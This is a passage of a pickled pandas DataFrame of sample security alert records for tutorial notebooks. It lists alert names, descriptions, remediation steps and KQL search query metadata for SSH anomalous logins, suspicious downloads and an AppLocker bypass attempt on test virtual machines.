tutorials-and-examples/example-notebooks/data/alerts

��d�pandas.core.frame�� DataFrame��)��}�(�_data��pandas.core.internals.managers��BlockManager��)��(]�(�pandas.core.indexes.base�� _new_Index��h�Index��}�(�data��numpy.core.multiarray��_reconstruct��numpy��ndarray��K��Cb��R�(KK��h�dtype��O8��R�(K�|�NNNJ��J��K?t�b�]�(�TenantId�� TimeGenerated��AlertDisplayName�� AlertName��Severity��Description��ProviderName�� VendorName��VendorOriginalId�� SystemAlertId�� ResourceId��SourceComputerId�� AlertType��ConfidenceLevel��ConfidenceScore�� IsIncident��StartTimeUtc�� EndTimeUtc��ProcessingEndTime��RemediationSteps��ExtendedProperties��Entities��SourceSystem��WorkspaceSubscriptionId��WorkspaceResourceGroup�� ExtendedLinks��ProductName��ProductComponentName�� AlertLink��Type��CompromisedEntity�et�b�name�Nu��R�h �pandas.core.indexes.numeric�� Int64Index��}�(hhhK��h��R�(KK)��h�i8��R�(K�<�NNNJ��J��Kt�b�BH !"#$%&'(�t�bhENu��R�e]�(hhK��h��R�(KKK)��h�f8��R�(KhSNNNJ��J��Kt�b�Bh��t�bhhK��h��R�(KKK)��h�M8��R�(KhSNNNJ��J��K}�(Cns�KKKt��t�b�BHH@x �H��o��H@x �H�M@�H`� ��H.� �H�S4J�H��72 �H��72 �H@x �H��72 �H`{�` �HЁ� �H�z�� H�J�7 �H�]�(��H �o��H~�k@��H��0n��H��H��H��Np�H1[4#�H�;��#�H��R!8�HFL�Y�H�&74W�HHRV��H��Hp��'��H�S˫�H��h��HĒ 嬌Hz�A��H��ⲌH��V��H��Y!�H��H��Hl�nًH&ҳ$9�H� n 5��t�bhhK��h��R�(KKK)��h�b1��R�(Kh"NNNJ��J��Kt�b�C)�t�bhhK��h��R�(KKK)��h!�]�(�$52b1ab41-869e-4138-9e40-2a4457f09bf0�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h��SSH Anomalous Login ML�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h��!Detected suspicious file download�h��4Possible suspicious scheduling tasks access detected��Security incident detected��Suspicious Activity Detected�h�h�h�h�h�h�h�h�h�h�h��"Suspicious system process executed��.Potential attempt to bypass AppLocker detected��.Security incident with shared process detected�h�h��SSH Anomalous Login ML�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h��!Detected suspicious file download�h��4Possible suspicious scheduling tasks access detected��Security incident detected��Suspicious Activity Detected�h�h�h�h�h�h�h�h�h�h�h��"Suspicious system process executed��.Potential attempt to bypass AppLocker detected��.Security incident with shared process detected�h�h��Low�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�� Informational�h��Medium�h�h�h�h�h�h�h�h�h�h��High�h�h�h�h�h��(Anomalous login detected for SSH account�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h��[Analysis of host data has detected suspicious download of remote file on MSTICALERTSLXVM2. �h��Analysis of host data indicates that a cron job was accessed by dbadmin. This activity could either be legitimate activity, or an indication of a compromised host that involved using task scheduling to execute malicious programs on a scheduled basis.��The incident which started on 2019-02-13 02:50:38 UTC and recently detected on 2019-02-15 10:14:37 UTC indicates that an attacker has abused resource in your resource MSTICALERTSLXVM2�X^Analysis of host data has detected a sequence of one or more processes running on MSTICAlertsWin1 that have historically been associated with malicious activity. While individual commands may appear benign the alert is scored based on an aggregation of these commands. This could either be legitimate activity, or an indication of a compromised host.�h�h�h�h�h�h�h�h�h�h��The incident which started on 2019-02-14 11:51:38 UTC and recently detected on 2019-02-14 18:03:23 UTC indicates that an attacker has abused resource in your resource MSTICALERTSWIN1��The system process c:\windows\fonts\conhost.exe was observed running in an abnormal context. Malware often use this process name to masquerade its malicious activity.�XAnalysis of host data on MSTICALERTSWIN1 detected a potential attempt to bypass AppLocker restrictions. AppLocker can be configured to implement a policy that limits what executables are allowed to run on a Windows system. The command line pattern similar to that identified in this alert has been previously associated with attacker attempts to circumvent AppLocker policy by using trusted executables (allowed by AppLocker policy) to execute untrusted code. This could be legitimate activity, or an indication of a compromised host.��The incident which started on 2019-02-12 11:48:01 UTC and recently detected on 2019-02-14 05:19:13 UTC indicates that an attacker has attacked other resources from your resource MSTICALERTSWIN1�h�h��CustomAlertRule�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�� Detection�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�� Alert Rule�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�� Microsoft�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h��$b0e143b8-4fa8-47bc-8bc1-9780c8b75541��$4f454388-02d3-4ace-98bf-3a7e4fdef361�h��$3f27593a-db5b-4ef4-bdc5-f6ce1915f496��$3cbe0028-14e8-43ad-8dc2-77c96d8bb015��$aa3b38dc-fea0-41aa-9b94-ec488d1d5ef3��$5211e92d-99e7-4145-a8e3-13c0b634e56c��$99a79fa6-fe78-4aea-aabe-562bc44fcd86�h�h�h��$e9bd8ad2-78d6-4e22-a635-7712f355168f��$22f2bdca-abd8-4fb1-ac7b-34a0ea3e0860��$fc691bac-20ec-421f-bcf0-6109788e732c��$9a5f4035-b5fc-4796-9aeb-ab6d10394bca��$ada3500e-77df-4202-bc39-9cfc73c3b02d��$e076f072-8e13-4cb4-9d65-008a58b04376��$5ba84676-cc6d-4c53-80bd-8d72fbe9d44c��$676e2c77-0fb5-46a8-ba17-d636a315267c��$abddc27a-e638-4f82-abd7-a0ff8e8e3450��$384e00d0-4afc-4e9a-8935-bec64d3951a4��$caab1270-55d3-4447-8618-16cf8672e4e1��$57b6af71-984e-45f3-9aac-d6bbd79eed07��$30ac5794-a265-4420-a1b7-6335ac08e2c0��$b946cd89-667e-4ce7-b571-9603859a7234��$c5116800-e694-4900-a6e3-28cc7875b093��$9647caf0-4f5c-4cde-8e85-2ac21f3755af��$ee0e339f-d0da-4dc6-898e-f5dc1ad8ec1c��$f2b534f2-603f-4416-bc70-cf6d73cac967��$5fa5324e-3ccf-4831-86f5-f4ff89db45f2��$105c0544-b8c3-44c3-86a6-cd2460881980��$09213933-5f9e-442d-84e1-e7cd2050a753��$ec4ff313-091b-4e3c-8fab-90e7d4bcb5ad��$26875da5-598c-4cd2-a2e5-2ac2adbeaf94��$52cd5101-d84e-4f84-8b08-652e67b9c88e��$79f27254-e85f-4471-a061-3ea99b824495��$65a3fe73-0832-427a-aab3-06edc2c27f0a��$daa18e53-ab1d-4d7d-8c4f-bcb86f75fd5f��$1f19db0b-3d5b-4f7b-b91f-5e994ba4bde5��$73934e37-1769-49d0-a406-4b97239f0b79��$6ed51e72-6170-4f28-b551-9b7b49936c4c��$f1ce87ca-8863-4a66-a0bd-a4d3776a7c64��$3968ef4e-b322-48ca-b297-e984aff8888d��$3a78a119-abe9-4b5e-9786-300ddcfd9530��$8f622935-1422-41e6-b8f6-9119e681645c��$64a2b4af-c3d7-422c-820b-7f1feb664222��$5dc33495-46c1-4232-9031-1cfa67c36724��$dbd390dc-7a94-47e4-83e4-60a390e4073c��$e7a2c7ee-f8aa-4684-805d-72041ea18cf7��$95fb8ee8-479d-4b5f-b061-0b76946c9f4f��$a17c8522-f069-4943-8783-171654d0de7c��$2de58958-55b0-4f0c-8113-063c815248a0��$214e5829-1a76-445b-845e-bf9ce81c3d4c��$41f1f6b6-d2ea-4821-9659-0cfab6558cec��$770459f6-d5ca-4561-a5fe-0911c64d3ace��$69a87b55-b6a5-4e58-8101-906a4051e29a��$2007a3bf-db86-4a2e-ab4c-240660c6820a��$52f884eb-4193-43e7-9e3a-63889edbfb04��$3f756526-328e-4dc2-badb-304acded79fe��$9e25fa59-032f-42be-b8a1-495b773d6ef8��$cf3d882a-3dc8-4526-80f0-0962b8d480c1��82518520133657099999_384e00d0-4afc-4e9a-8935-bec64d3951a4��82518520981440769999_caab1270-55d3-4447-8618-16cf8672e4e1��82518520973978269999_57b6af71-984e-45f3-9aac-d6bbd79eed07��82518522745615999999_30ac5794-a265-4420-a1b7-6335ac08e2c0��82518520402897969999_b946cd89-667e-4ce7-b571-9603859a7234��82518520409706099999_c5116800-e694-4900-a6e3-28cc7875b093��$6a5661f9-9a57-4aa8-bb01-1d6743af998e��$c10ed21e-c5e6-4e7f-bb86-e586bfa2a2a3��$83062676-4b8d-4579-bcc9-196f086b93af��$a37e604d-fc93-43cc-997f-8b5c2fc53990��$723f61c8-86bd-46b4-96af-9b6509b0e83e��$cdaac819-757e-4296-9b64-5edd7e35e57f��$6d53e2fc-3cfc-4c04-8396-c3dcbf1caa5e��$eea9d793-0e7e-4911-a0e9-cf87bea6ec3e��$e782d6be-34d2-41c0-8b39-14ebbeef01a3��82518521557015111330_79f27254-e85f-4471-a061-3ea99b824495��82518521557015111330_65a3fe73-0832-427a-aab3-06edc2c27f0a��82518521557014927413_daa18e53-ab1d-4d7d-8c4f-bcb86f75fd5f��82518523287189999999_1f19db0b-3d5b-4f7b-b91f-5e994ba4bde5��$932a6e3c-7747-4e89-8159-c597868089bb��82518517970377929999_6ed51e72-6170-4f28-b551-9b7b49936c4c�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G��/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsLxVM2�h�h�h�/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1�h�G�G�G�G�G�G�G�G�G�h�h�h�h�G�h�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G��$44623fb0-bd5f-49ea-84d1-56aa11ab8a25�h�h�h�$263a788b-6526-4cdc-8ed9-d79402fe4aa0�h�G�G�G�G�G�G�G�G�G�h�h�h�h�G�h�4CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h��#SCUBA_RULE_Suspicious_file_download�h��SCUBA_RULE_AccessCronJob��KillChainFusionIncident��SuspiciousActivity�h�h�h�h�h�h�h�h�h�h�h��SuspiciousSystemProcess��SCUBA_RULE_Applocker_Bypass�h�h�h��Unknown�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h�h��2021-06-29 10:41:10.069368��2021-06-29 10:11:10.069368�h��2021-06-29 10:25:27.069368��2021-06-29 10:06:10.069368��2021-06-29 10:31:10.069368��2021-06-29 10:01:10.069368��2021-06-29 10:36:10.069368�jh�j�2021-06-29 10:21:10.069368��2021-06-29 10:16:10.069368��2021-06-29 10:26:10.069368��2021-06-29 12:06:29.069368��2021-06-28 08:01:10.069368��2021-06-28 08:06:10.069368��2021-06-28 08:21:10.069368��2021-06-28 06:16:10.069368��2021-06-28 05:42:07.069368��2021-06-27 12:16:02.069368��2021-06-26 12:43:03.069368��2021-06-26 12:55:30.069368��2021-06-24 11:42:46.069368��2021-06-27 04:47:18.069368��2021-06-27 04:35:57.069368��2021-06-28 05:56:10.069368��2021-06-28 05:51:10.069368��2021-06-28 06:11:10.069368��2021-06-28 05:46:10.069368��2021-06-28 06:01:10.069368��2021-06-28 06:06:10.069368��2021-06-28 08:11:10.069368��2021-06-28 07:56:10.069368��2021-06-28 08:16:10.069368��2021-06-25 20:43:46.069368�jj�2021-06-23 20:40:09.069368��2021-06-30 01:31:29.069368��2021-06-30 00:21:30.069368��2021-06-29 11:06:10.069916��2021-06-29 10:36:10.069916�j �2021-06-29 11:20:27.069916��2021-06-29 10:31:10.069916��2021-06-29 10:56:10.069916��2021-06-29 10:26:10.069916��2021-06-29 11:01:10.069916�j&j j&�2021-06-29 10:46:10.069916��2021-06-29 10:41:10.069916��2021-06-29 10:51:10.069916��2021-06-29 12:06:29.069916��2021-06-28 08:26:10.069916��2021-06-28 08:31:10.069916��2021-06-28 08:46:10.069916��2021-06-28 06:41:10.069916��2021-06-28 06:07:07.069916��2021-06-27 12:11:02.069916��2021-06-26 12:38:03.069916��2021-06-26 12:50:30.069916�j2�2021-06-27 04:42:18.069916��2021-06-27 04:30:57.069916��2021-06-28 06:21:10.069916��2021-06-28 06:16:10.069916��2021-06-28 06:36:10.069916��2021-06-28 06:11:10.069916��2021-06-28 06:26:10.069916��2021-06-28 06:31:10.069916��2021-06-28 08:36:10.069916��2021-06-28 08:21:10.069916��2021-06-28 08:41:10.069916��2021-06-25 20:38:46.069916�j>j>�2021-06-25 07:54:32.069916��2021-06-30 01:31:29.069916��2021-06-30 00:16:30.069916��2021-06-29 11:16:10.070434��2021-06-29 10:46:12.070434�jB�2021-06-29 11:30:30.070434��2021-06-29 10:41:14.070434��2021-06-29 11:06:13.070434��2021-06-29 10:36:14.070434��2021-06-29 11:11:10.070434�jHjBjH�2021-06-29 10:56:10.070434��2021-06-29 10:51:14.070434��2021-06-29 11:01:11.070434��2021-06-29 12:06:32.070434��2021-06-28 08:36:12.070434��2021-06-28 08:41:14.070434��2021-06-28 08:56:13.070434��2021-06-28 06:51:13.070434��2021-06-28 06:17:09.070434��2021-06-27 12:11:07.070434��2021-06-26 12:38:12.070434��2021-06-26 12:50:33.070434��2021-06-26 19:01:40.070434��2021-06-27 05:14:41.070434��2021-06-27 04:31:06.070434��2021-06-28 06:31:10.070434��2021-06-28 06:26:18.070434��2021-06-28 06:46:10.070434��2021-06-28 06:21:14.070434��2021-06-28 06:36:12.070434��2021-06-28 06:41:24.070434��2021-06-28 08:46:11.070434��2021-06-28 08:31:12.070434��2021-06-28 08:51:12.070434��2021-06-26 02:50:26.070434��2021-06-25 20:39:10.070434�jb�2021-06-25 14:06:16.070434��2021-06-30 01:31:29.070434��2021-06-30 00:16:32.070434�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G�G��[ "Review with dbadmin that the command identified in the alert was legitimate activity that you expect to see on MSTICALERTSLXVM2. If not, escalate the alert to the information security team." ]�jf��[ "Review with dbadmin the activity in this alert to see if you recognize this as legitimate administrative activity. If not, escalate the alert to the information security team." ]��[ "1. Escalate the alert to the information security team.", "2. Review the remediation steps of each one of the alerts" ]��[ "Review each of the individual line items in this alert to see if you recognise them as legitimate administrative activity." ]�jfG�G�G�G�G�G�G�G�G�jhX�[ "1. Run Process Explorer and try to identify unknown running processes (see https://technet.microsoft.com/en-us/sysinternals/bb896653.aspx)", "2. Make sure the machine is completely updated and has an updated anti-malware application installed", "3. Run a full anti-malware scan and verify that the threat was removed", "4. Install and run Microsoft’s Malicious Software Removal Tool (see https://www.microsoft.com/en-us/download/malicious-software-removal-tool-details.aspx)", "5. Run Microsoft’s Autoruns utility and try to identify unknown applications that are configured to run at login (see https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)" ]��[ "Review with MSTICALERTSWIN1\\MSTICAdmin the suspicious command line in this alert to see if you recognise this as legitimate activity that you expect to see on MSTICALERTSWIN1. If not, escalate the alert to the information security team." ]�jhG�jfX,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-18T02%3A19%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Host Entities": "1", "Total IP Entities": "1", "Total Account Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-18T01%3A49%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total Host Entities": "1", "Total IP Entities": "1" }�jlX,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":3600,\"intervalEnd\":\"2019-02-18T02%3A33%3A19.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "2", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "60", "Suppression in Minutes": "0", "Total IP Entities": "2", "Total Account Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-18T01%3A44%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total IP Entities": "1", "Total Account Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-18T02%3A09%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total IP Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-18T01%3A39%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Host Entities": "1", "Total IP Entities": "1", "Total Account Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-18T02%3A14%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total IP Entities": "1", "Total Host Entities": "1" }�jrjljrX,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-18T01%3A59%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "2", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total IP Entities": "2", "Total Account Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-18T01%3A54%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "2", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total IP Entities": "2", "Total Account Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-18T02%3A04%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "2", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total IP Entities": "2", "Total Account Entities": "1", "Total Host Entities": "1" }�X*{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":300,\"intervalEnd\":\"2019-02-18T03%3A19%3A21.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "5", "Suppression in Minutes": "0", "Total IP Entities": "1", "Total Account Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T23%3A39%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "4", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total IP Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T23%3A44%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "4", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total IP Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity 